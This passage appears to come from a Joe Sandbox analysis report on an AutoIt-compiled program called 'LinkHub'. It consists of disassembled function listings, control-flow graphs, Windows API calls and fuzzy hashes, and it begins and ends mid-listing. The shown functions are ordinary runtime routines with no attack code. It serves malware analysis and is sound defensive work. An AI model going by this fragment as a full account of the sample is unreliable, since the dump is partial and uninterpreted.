                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C736BF
                                                                    • LoadIconW.USER32(000000A9), ref: 00C736D5
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C736E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: 406d5fa7d9c004c91a12e0c670a978856a1a10f94eb9846aca1bcbddc1c626ae
                                                                    • Instruction ID: 9096275425c81788971db8251aeaf502ace0908495946cccfd73b987be198ef3
                                                                    • Opcode Fuzzy Hash: 406d5fa7d9c004c91a12e0c670a978856a1a10f94eb9846aca1bcbddc1c626ae
                                                                    • Instruction Fuzzy Hash: 9F21EDB9941308AFDB00DFE4E889BADBBB5FB09710F10411AF619E63A0D7B446448FA1
                                                                    Function 00CB09DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 366 cb09db-cb0a0b call cb07af 369 cb0a0d-cb0a18 call c9f636 366->369 370 cb0a26-cb0a32 call ca5594 366->370 375 cb0a1a-cb0a21 call c9f649 369->375 376 cb0a4b-cb0a94 call cb071a 370->376 377 cb0a34-cb0a49 call c9f636 call c9f649 370->377 387 cb0cfd-cb0d03 375->387 385 cb0b01-cb0b0a GetFileType 376->385 386 cb0a96-cb0a9f 376->386 377->375 391 cb0b0c-cb0b3d GetLastError call c9f613 CloseHandle 385->391 392 cb0b53-cb0b56 385->392 389 cb0aa1-cb0aa5 386->389 390 cb0ad6-cb0afc GetLastError call c9f613 386->390 389->390 396 cb0aa7-cb0ad4 call cb071a 389->396 390->375 391->375 403 cb0b43-cb0b4e call c9f649 391->403 394 cb0b58-cb0b5d 392->394 395 cb0b5f-cb0b65 392->395 399 cb0b69-cb0bb7 call ca54dd 394->399 395->399 400 cb0b67 395->400 396->385 396->390 409 cb0bb9-cb0bc5 call cb092b 399->409 410 cb0bc7-cb0beb call cb04cd 399->410 400->399 403->375 409->410 417 cb0bef-cb0bf9 call ca8a2e 409->417 415 cb0bfe-cb0c41 410->415 416 cb0bed 410->416 419 cb0c43-cb0c47 415->419 420 cb0c62-cb0c70 415->420 416->417 417->387 419->420 422 cb0c49-cb0c5d 419->422 423 cb0cfb 420->423 424 cb0c76-cb0c7a 420->424 422->420 423->387 424->423 425 cb0c7c-cb0caf CloseHandle call cb071a 424->425 428 cb0ce3-cb0cf7 425->428 429 cb0cb1-cb0cdd GetLastError call c9f613 call ca56a6 425->429 428->423 429->428
                                                                    APIs
                                                                      • Part of subcall function 00CB071A: CreateFileW.KERNELBASE(00000000,00000000,?,00CB0A84,?,?,00000000,?,00CB0A84,00000000,0000000C), ref: 00CB0737
                                                                    • GetLastError.KERNEL32 ref: 00CB0AEF
                                                                    • __dosmaperr.LIBCMT ref: 00CB0AF6
                                                                    • GetFileType.KERNELBASE(00000000), ref: 00CB0B02
                                                                    • GetLastError.KERNEL32 ref: 00CB0B0C
                                                                    • __dosmaperr.LIBCMT ref: 00CB0B15
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CB0B35
                                                                    • CloseHandle.KERNEL32(?), ref: 00CB0C7F
                                                                    • GetLastError.KERNEL32 ref: 00CB0CB1
                                                                    • __dosmaperr.LIBCMT ref: 00CB0CB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                    • String ID: H
                                                                    • API String ID: 4237864984-2852464175
                                                                    • Opcode ID: a50594550d9ddeb98fff84695b26f2529ac875a5d0abbe3911ff5bfb9060f88c
                                                                    • Instruction ID: 6d3f2491af0b9aeed5bdb8d50941146ec322af51d4cd6b0a5e875ff379d63b1f
                                                                    • Opcode Fuzzy Hash: a50594550d9ddeb98fff84695b26f2529ac875a5d0abbe3911ff5bfb9060f88c
                                                                    • Instruction Fuzzy Hash: 62A12736A002088FDF19AF68D852BEE7BA1AF06324F24015DF811DB3E1DB319D16DB61
                                                                    Function 00C752A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00C75594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00CB4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00C755B2
                                                                      • Part of subcall function 00C75238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C7525A
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C753C4
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00CB4BFD
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00CB4C3E
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00CB4C80
                                                                    • _wcslen.LIBCMT ref: 00CB4CE7
                                                                    • _wcslen.LIBCMT ref: 00CB4CF6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                    • API String ID: 98802146-2727554177
                                                                    • Opcode ID: 352e48d1d81c12c2679c9175a2e4c1d2880c4f2ae485a5b4beb4676b19865678
                                                                    • Instruction ID: cc54593ea8fc9a3fe23bf211d0eee04b596a3a155b10189f0e8364bdd3f1d961
                                                                    • Opcode Fuzzy Hash: 352e48d1d81c12c2679c9175a2e4c1d2880c4f2ae485a5b4beb4676b19865678
                                                                    • Instruction Fuzzy Hash: 2D71BD751043009FC704EF69EC8999ABBE8FF59740F90442EF049C32B1DB719A08DB62
                                                                    Function 00C734D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00C734DE
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00C734ED
                                                                    • LoadIconW.USER32(00000063), ref: 00C73503
                                                                    • LoadIconW.USER32(000000A4), ref: 00C73515
                                                                    • LoadIconW.USER32(000000A2), ref: 00C73527
                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C7353F
                                                                    • RegisterClassExW.USER32(?), ref: 00C73590
                                                                      • Part of subcall function 00C73624: GetSysColorBrush.USER32(0000000F), ref: 00C73657
                                                                      • Part of subcall function 00C73624: RegisterClassExW.USER32(00000030), ref: 00C73681
                                                                      • Part of subcall function 00C73624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C73692
                                                                      • Part of subcall function 00C73624: InitCommonControlsEx.COMCTL32(?), ref: 00C736AF
                                                                      • Part of subcall function 00C73624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C736BF
                                                                      • Part of subcall function 00C73624: LoadIconW.USER32(000000A9), ref: 00C736D5
                                                                      • Part of subcall function 00C73624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C736E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: 326b61b3298efa52ce09fde44c0696d9bb1ba60ae8ea30e30be8964d4483abe9
                                                                    • Instruction ID: 0572d551b7107bfba0ff8030d806a58ce5adec321eb911d2d847bc5279424905
                                                                    • Opcode Fuzzy Hash: 326b61b3298efa52ce09fde44c0696d9bb1ba60ae8ea30e30be8964d4483abe9
                                                                    • Instruction Fuzzy Hash: A2213978D00358ABDB109FA5EC49BA9BFB5FB49B50F40401EF608E63A0C3B915848FA0
                                                                    Function 00C7370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 507 c7370f-c73724 508 c73726-c73729 507->508 509 c73784-c73786 507->509 510 c7372b-c73732 508->510 511 c7378a 508->511 509->508 512 c73788 509->512 513 c73804-c7380c PostQuitMessage 510->513 514 c73738-c7373d 510->514 516 c73790-c73795 511->516 517 cb3df4-cb3e1c call c72f92 call c8f23c 511->517 515 c7376f-c73777 DefWindowProcW 512->515 522 c737b8-c737ba 513->522 518 c73743-c73747 514->518 519 cb3e61-cb3e75 call cdc8f7 514->519 521 c7377d-c73783 515->521 523 c73797-c7379a 516->523 524 c737bc-c737e3 SetTimer RegisterWindowMessageW 516->524 553 cb3e21-cb3e28 517->553 525 c7380e-c7381d call c8fcad 518->525 526 c7374d-c73752 518->526 519->522 544 cb3e7b 519->544 522->521 530 c737a0-c737b3 KillTimer call c73907 call c759ff 523->530 531 cb3d95-cb3d98 523->531 524->522 527 c737e5-c737f0 CreatePopupMenu 524->527 525->522 533 cb3e46-cb3e4d 526->533 534 c73758-c7375d 526->534 527->522 530->522 538 cb3d9a-cb3d9e 531->538 539 cb3dd0-cb3def MoveWindow 531->539 533->515 541 cb3e53-cb3e5c call cd1423 533->541 542 c73763-c73769 534->542 543 c737f2-c73802 call c7381f 534->543 547 cb3dbf-cb3dcb SetFocus 538->547 548 cb3da0-cb3da3 538->548 539->522 541->515 542->515 542->553 543->522 544->515 547->522 548->542 549 cb3da9-cb3dba call c72f92 548->549 549->522 553->515 557 cb3e2e-cb3e41 call c73907 call c7396b 553->557 557->515
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00C73709,?,?), ref: 00C73777
                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00C73709,?,?), ref: 00C737A3
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C737C6
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00C73709,?,?), ref: 00C737D1
                                                                    • CreatePopupMenu.USER32 ref: 00C737E5
                                                                    • PostQuitMessage.USER32(00000000), ref: 00C73806
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: TaskbarCreated
                                                                    • API String ID: 129472671-2362178303
                                                                    • Opcode ID: c4aafa606e3730efbed7fbc1e8a332d81afab8a885efa014699b19dbb23d3b71
                                                                    • Instruction ID: c19319e5fa3af914a3572e2891f31b1dbfcf2740efe6e36d7f0c1571da2bb260
                                                                    • Opcode Fuzzy Hash: c4aafa606e3730efbed7fbc1e8a332d81afab8a885efa014699b19dbb23d3b71
                                                                    • Instruction Fuzzy Hash: C841E1F52403C4BBDB182F7D8E4DBB93AA5EB45300F44812AF51EC63A0DA759B44BA71
                                                                    Function 00C72AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 563 c72ab0-c72ae9 564 cb3a1a-cb3a1b DestroyWindow 563->564 565 c72aef-c72b05 mciSendStringW 563->565 568 cb3a26-cb3a33 564->568 566 c72d66-c72d73 565->566 567 c72b0b-c72b13 565->567 570 c72d75-c72d90 UnregisterHotKey 566->570 571 c72d98-c72d9f 566->571 567->568 569 c72b19-c72b28 call c72ede 567->569 572 cb3a62-cb3a69 568->572 573 cb3a35-cb3a38 568->573 584 c72b2e-c72b36 569->584 585 cb3a70-cb3a7c 569->585 570->571 575 c72d92-c72d93 call c72770 570->575 571->567 576 c72da5 571->576 572->568 581 cb3a6b 572->581 577 cb3a3a-cb3a42 call c77aab 573->577 578 cb3a44-cb3a47 FindClose 573->578 575->571 576->566 583 cb3a4d-cb3a5a 577->583 578->583 581->585 583->572 589 cb3a5c-cb3a5d call ce3cf6 583->589 590 c72b3c-c72b61 call c7e6a0 584->590 591 cb3a94-cb3aa1 584->591 586 cb3a7e-cb3a80 FreeLibrary 585->586 587 cb3a86-cb3a8d 585->587 586->587 587->585 592 cb3a8f 587->592 589->572 601 c72b63 590->601 602 c72b98-c72ba3 CoUninitialize 590->602 593 cb3ac8-cb3acf 591->593 594 cb3aa3-cb3ac0 VirtualFree 591->594 592->591 593->591 598 cb3ad1 593->598 594->593 597 cb3ac2-cb3ac3 call ce3d5c 594->597 597->593 603 cb3ad6-cb3ada 598->603 605 c72b66-c72b96 call c730c0 call c73069 601->605 602->603 604 c72ba9-c72bae 602->604 603->604 608 cb3ae0-cb3ae4 call ce0b4c 603->608 606 cb3aeb-cb3af8 call ce3d30 604->606 607 c72bb4-c72bbe 604->607 605->602 619 cb3afa 606->619 612 c72da7-c72db4 call c8fb19 607->612 613 c72bc4-c72c45 call c7bd98 call c72ff4 call c72e85 call c90184 call c72e1c call c7bd98 call c7e6a0 call c72eae call c90184 607->613 618 cb3ae6 608->618 612->613 623 c72dba 612->623 625 cb3aff-cb3b21 call c9013d 613->625 653 c72c4b-c72c6f call c90184 613->653 618->604 619->625 623->612 631 cb3b23 625->631 634 cb3b28-cb3b4a call c9013d 631->634 641 cb3b4c 634->641 644 cb3b51-cb3b73 call c9013d 641->644 649 cb3b75 644->649 652 cb3b7a-cb3b87 call cd6e3b 649->652 658 cb3b89 652->658 653->634 659 c72c75-c72c99 call c90184 653->659 661 cb3b8e-cb3b9b call c8bdf0 658->661 659->644 664 c72c9f-c72cb9 call c90184 659->664 668 cb3b9d 661->668 664->652 669 c72cbf-c72ce3 call c72e85 call c90184 664->669 671 cb3ba2-cb3baf call ce3c8a 668->671 669->661 678 c72ce9-c72cf1 669->678 676 cb3bb1 671->676 679 cb3bb6-cb3bc3 call ce3d11 676->679 678->671 680 c72cf7-c72d15 call c7bd98 call c72fba 678->680 685 cb3bc5 679->685 680->679 689 c72d1b-c72d29 680->689 688 cb3bca-cb3bd7 call ce3d11 685->688 695 cb3bd9 688->695 689->688 691 c72d2f-c72d65 call c7bd98 * 3 call c72f26 689->691 695->695
                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C72AF9
                                                                    • CoUninitialize.COMBASE ref: 00C72B98
                                                                    • UnregisterHotKey.USER32(?), ref: 00C72D7D
                                                                    • DestroyWindow.USER32(?), ref: 00CB3A1B
                                                                    • FreeLibrary.KERNEL32(?), ref: 00CB3A80
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CB3AAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 469580280-3243417748
                                                                    • Opcode ID: fee9ee2034ba2612486269a536b3ae8f864c8d5a9cc5091e92abf0708624b6bf
                                                                    • Instruction ID: 642dfc6ab987d43a87cc1c8899c3fbe40120c7be38a2de52c8f606106bc5aea9
                                                                    • Opcode Fuzzy Hash: fee9ee2034ba2612486269a536b3ae8f864c8d5a9cc5091e92abf0708624b6bf
                                                                    • Instruction Fuzzy Hash: BFD16B71701252DFCB29EF55C859B69F7A1BF04710F2182AEE84EAB251CB30AE12DF54
                                                                    Function 00CA90C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 703 ca90c5-ca90d5 704 ca90ef-ca90f1 703->704 705 ca90d7-ca90ea call c9f636 call c9f649 703->705 706 ca9459-ca9466 call c9f636 call c9f649 704->706 707 ca90f7-ca90fd 704->707 719 ca9471 705->719 725 ca946c call ca2b5c 706->725 707->706 711 ca9103-ca912e 707->711 711->706 714 ca9134-ca913d 711->714 717 ca913f-ca9152 call c9f636 call c9f649 714->717 718 ca9157-ca9159 714->718 717->725 722 ca915f-ca9163 718->722 723 ca9455-ca9457 718->723 724 ca9474-ca9479 719->724 722->723 727 ca9169-ca916d 722->727 723->724 725->719 727->717 730 ca916f-ca9186 727->730 731 ca9188-ca918b 730->731 732 ca91a3-ca91ac 730->732 734 ca918d-ca9193 731->734 735 ca9195-ca919e 731->735 736 ca91ca-ca91d4 732->736 737 ca91ae-ca91c5 call c9f636 call c9f649 call ca2b5c 732->737 734->735 734->737 738 ca923f-ca9259 735->738 740 ca91db-ca91f9 call ca3b93 call ca2d38 * 2 736->740 741 ca91d6-ca91d8 736->741 768 ca938c 737->768 743 ca925f-ca926f 738->743 744 ca932d-ca9336 call cafc1b 738->744 772 ca91fb-ca9211 call c9f649 call c9f636 740->772 773 ca9216-ca923c call ca97a4 740->773 741->740 743->744 748 ca9275-ca9277 743->748 757 ca9338-ca934a 744->757 758 ca93a9 744->758 748->744 753 ca927d-ca92a3 748->753 753->744 754 ca92a9-ca92bc 753->754 754->744 759 ca92be-ca92c0 754->759 757->758 763 ca934c-ca935b GetConsoleMode 757->763 761 ca93ad-ca93c5 ReadFile 758->761 759->744 764 ca92c2-ca92ed 759->764 766 ca9421-ca942c GetLastError 761->766 767 ca93c7-ca93cd 761->767 763->758 769 ca935d-ca9361 763->769 764->744 771 ca92ef-ca9302 764->771 774 ca942e-ca9440 call c9f649 call c9f636 766->774 775 ca9445-ca9448 766->775 767->766 776 ca93cf 767->776 770 ca938f-ca9399 call ca2d38 768->770 769->761 777 ca9363-ca937d ReadConsoleW 769->777 770->724 771->744 779 ca9304-ca9306 771->779 772->768 773->738 774->768 786 ca944e-ca9450 775->786 787 ca9385-ca938b call c9f613 775->787 783 ca93d2-ca93e4 776->783 784 ca939e-ca93a7 777->784 785 ca937f GetLastError 777->785 779->744 789 ca9308-ca9328 779->789 783->770 793 ca93e6-ca93ea 783->793 784->783 785->787 786->770 787->768 789->744 798 ca93ec-ca93fc call ca8de1 793->798 799 ca9403-ca940e 793->799 810 ca93ff-ca9401 798->810 800 ca941a-ca941f call ca8c21 799->800 801 ca9410 call ca8f31 799->801 808 ca9415-ca9418 800->808 801->808 808->810 810->770
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a49ce1bb4f55d7cc325cf483114927f305349875f358095abdb38ca4bec646a4
                                                                    • Instruction ID: 31d09ece14c7d865fdce7362943dbd51bbcf7a5248ef0ac53b837e14f45c765e
                                                                    • Opcode Fuzzy Hash: a49ce1bb4f55d7cc325cf483114927f305349875f358095abdb38ca4bec646a4
                                                                    • Instruction Fuzzy Hash: E9C1E17590434AAFCF11DFA9D846BADBBB0EF0B318F144059E564E73A2C7308A42CB61
                                                                    Function 00C8AC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 811 c8ac3e-c8b063 call c78ec0 call c8bc58 call c7e6a0 818 c8b069-c8b073 811->818 819 cc8584-cc8591 811->819 820 c8b079-c8b07e 818->820 821 cc896b-cc8979 818->821 822 cc8596-cc85a5 819->822 823 cc8593 819->823 824 c8b084-c8b090 call c8b5b6 820->824 825 cc85b2-cc85b4 820->825 828 cc897e 821->828 829 cc897b 821->829 826 cc85aa 822->826 827 cc85a7 822->827 823->822 833 cc85bd 824->833 836 c8b096-c8b0a3 call c7c98d 824->836 825->833 826->825 827->826 831 cc8985-cc898e 828->831 829->828 834 cc8990 831->834 835 cc8993 831->835 837 cc85c7 833->837 834->835 838 cc899c-cc89eb call c7e6a0 call c8bbbe * 2 835->838 844 c8b0ab-c8b0b4 836->844 842 cc85cf-cc85d2 837->842 874 c8b1e0-c8b1f5 838->874 875 cc89f1-cc8a03 call c8b5b6 838->875 845 c8b158-c8b16f 842->845 846 cc85d8-cc8600 call c94cd3 call c77ad5 842->846 848 c8b0b8-c8b0d6 call c94d98 844->848 851 cc8954-cc8957 845->851 852 c8b175 845->852 887 cc862d-cc8651 call c77b1a call c7bd98 846->887 888 cc8602-cc8606 846->888 867 c8b0d8-c8b0e1 848->867 868 c8b0e5 848->868 856 cc895d-cc8960 851->856 857 cc8a41-cc8a79 call c7e6a0 call c8bbbe 851->857 858 cc88ff-cc8920 call c7e6a0 852->858 859 c8b17b-c8b17e 852->859 856->838 864 cc8962-cc8965 856->864 857->874 910 cc8a7f-cc8a91 call c8b5b6 857->910 858->874 880 cc8926-cc8938 call c8b5b6 858->880 865 cc8729-cc8743 call c8bbbe 859->865 866 c8b184-c8b187 859->866 864->821 864->874 896 cc888f-cc88b5 call c7e6a0 865->896 897 cc8749-cc874c 865->897 876 c8b18d-c8b190 866->876 877 cc86ca-cc86e0 call c76c03 866->877 867->848 878 c8b0e3 867->878 868->837 870 c8b0eb-c8b0fc 868->870 870->821 881 c8b102-c8b11c 870->881 882 c8b1fb-c8b20b call c7e6a0 874->882 883 cc8ac9-cc8acf 874->883 915 cc8a2f-cc8a3c call c7c98d 875->915 916 cc8a05-cc8a0d 875->916 890 cc8656-cc8659 876->890 891 c8b196-c8b1b8 call c7e6a0 876->891 877->874 913 cc86e6-cc86fc call c8b5b6 877->913 878->870 920 cc893a-cc8943 call c7c98d 880->920 921 cc8945 880->921 881->842 893 c8b122-c8b154 call c8bbbe call c7e6a0 881->893 883->844 899 cc8ad5 883->899 887->890 888->887 901 cc8608-cc862b call c7ad40 888->901 890->821 894 cc865f-cc8674 call c76c03 890->894 891->874 934 c8b1ba-c8b1cc call c8b5b6 891->934 893->845 894->874 941 cc867a-cc8690 call c8b5b6 894->941 896->874 944 cc88bb-cc88cd call c8b5b6 896->944 908 cc874e-cc8751 897->908 909 cc87bf-cc87de call c7e6a0 897->909 899->821 901->887 901->888 924 cc8ada-cc8ae8 908->924 925 cc8757-cc8774 call c7e6a0 908->925 909->874 961 cc87e4-cc87f6 call c8b5b6 909->961 957 cc8ab5-cc8abe call c7c98d 910->957 958 cc8a93-cc8a9b 910->958 962 cc870d-cc8716 call c78ec0 913->962 963 cc86fe-cc870b call c78ec0 913->963 954 cc8ac2-cc8ac4 915->954 932 cc8a1e-cc8a29 call c7b4b1 916->932 933 cc8a0f-cc8a13 916->933 940 cc8949-cc894f 920->940 921->940 947 cc8aed-cc8afd 924->947 948 cc8aea 924->948 925->874 971 cc877a-cc878c call c8b5b6 925->971 932->915 967 cc8b0b-cc8b19 932->967 933->932 950 cc8a15-cc8a19 933->950 968 cc86ba-cc86c3 call c7c98d 934->968 969 c8b1d2-c8b1de 934->969 940->874 980 cc869d-cc86ab call c78ec0 941->980 981 cc8692-cc869b call c7c98d 941->981 985 cc88de 944->985 986 cc88cf-cc88dc call c7c98d 944->986 964 cc8aff 947->964 965 cc8b02-cc8b06 947->965 948->947 966 cc8aa1-cc8aa3 950->966 954->874 957->954 972 cc8a9d 958->972 973 cc8aa8-cc8ab3 call c7b4b1 958->973 961->874 1000 cc87fc-cc8805 call c8b5b6 961->1000 992 cc8719-cc8724 call c78577 962->992 963->992 964->965 965->882 966->874 990 cc8b1e-cc8b21 967->990 991 cc8b1b 967->991 968->877 969->874 1004 cc878e-cc879d call c7c98d 971->1004 1005 cc879f 971->1005 972->966 973->957 973->967 1011 cc86ae-cc86b5 980->1011 981->1011 999 cc88e2-cc88e9 985->999 986->999 990->831 991->990 992->874 1007 cc88eb-cc88f0 call c7396b 999->1007 1008 cc88f5 call c73907 999->1008 1017 cc8818 1000->1017 1018 cc8807-cc8816 call c7c98d 1000->1018 1013 cc87a3-cc87ae call c99334 1004->1013 1005->1013 1007->874 